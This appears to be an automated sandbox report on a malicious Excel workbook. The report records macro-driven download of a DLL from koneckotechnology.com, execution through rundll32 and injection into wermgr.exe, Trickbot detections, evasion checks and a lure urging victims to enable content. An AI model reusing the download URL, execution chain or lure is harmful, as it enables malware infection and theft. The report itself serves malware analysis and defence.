Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: hsdksksk.iem.0.dr	Binary or memory string: ORIGINALFILENAMESNIFFER.EXEJ
Source: hsdksksk.iem.0.dr	Binary or memory string: INTERNALNAMESNIFFER.EXE

Found dropped PE file which has not been started or loaded

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll

Jump to dropped file

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

4_2_003A1030

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_002C095E mov eax, dword ptr fs:[00000030h]	4_2_002C095E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_002C0456 mov eax, dword ptr fs:[00000030h]	4_2_002C0456
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_003A1030 mov eax, dword ptr fs:[00000030h]	4_2_003A1030

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

4_2_003A1030

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe			Jump to behavior

Stealing of Sensitive Information:

Yara detected Trickbot

Source: Yara match	File source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2100613239.00000000003A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2c052e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2c052e.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Trickbot

Source: Yara match	File source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2100613239.00000000003A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2c052e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2c052e.1.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.54.114.131	koneckotechnology.com	United States		22612	NAMECHEAP-NETUS	false

Contacted Domains

Name	IP	Active
koneckotechnology.com	198.54.114.131	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://koneckotechnology.com/netmons.dll	false	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll	ReversingLabs: Detection: 12%
Source: C:\Users\user\hsdksksk.iem	ReversingLabs: Detection: 12%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Heur.32219.xls

Virustotal: Detection: 8%

Perma Link

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: k:\MSSniffer\Release\Sniffer.pdb\A source: hsdksksk.iem.0.dr
Source:	Binary string: k:\MSSniffer\Release\Sniffer.pdb source: hsdksksk.iem.0.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll

Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: netmons[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: koneckotechnology.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.54.114.131:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.54.114.131:80

Networking:

Downloads executable code via HTTP

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.54.114.131 198.54.114.131

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70BA6ED2.emf

Jump to behavior

Source: global traffic

Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: koneckotechnology.com

Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 4	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 8	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 8	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 12	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 12	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 16	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 16	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 20	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 20	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 24	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 24	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 28	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 28	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 32	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 32	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 36	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 36	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 40	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 40	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 44	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 44	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 48	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 48	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 52	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 52	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 56	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 56	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 60	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 60	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 64	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 64	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 68	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 68	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 72	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 72	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 76	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 76	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 80	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 80	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 84	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 84	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 88	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 88	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 92	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 92	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 96	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 96	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 100	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 100	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 104	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 104	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 108	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 108	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 112	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 112	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 116	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 116	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 120	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 120	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 124	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 124	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 128	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 128	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 132	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 132	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 136	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 136	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 140	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 140	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
Source: Screenshot number: 144	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
Source: Screenshot number: 144	Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3

Found Excel 4.0 Macro with suspicious formulas

Source: SecuriteInfo.com.Heur.32219.xls

Initial sample: EXEC

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\hsdksksk.iem			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Document contains embedded VBA macros

Source: SecuriteInfo.com.Heur.32219.xls

OLE indicator, VBA macros: true

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll 697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
Source: Joe Sandbox View	Dropped File: C:\Users\user\hsdksksk.iem 697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D

Yara signature match

Source: SecuriteInfo.com.Heur.32219.xls, type: SAMPLE

Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@7/7@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD6FD.tmp

Jump to behavior

Source: SecuriteInfo.com.Heur.32219.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW

Source: SecuriteInfo.com.Heur.32219.xls

Virustotal: Detection: 8%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: k:\MSSniffer\Release\Sniffer.pdb\A source: hsdksksk.iem.0.dr
Source:	Binary string: k:\MSSniffer\Release\Sniffer.pdb source: hsdksksk.iem.0.dr

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

4_2_003A1030

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00485950 push dword ptr [edx+14h]; ret

4_2_00485A5D

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\hsdksksk.iem			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\hsdksksk.iem

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\hsdksksk.iem

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\hsdksksk.iem

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: hsdksksk.iem.0.dr	Binary or memory string: ORIGINALFILENAMESNIFFER.EXEJ
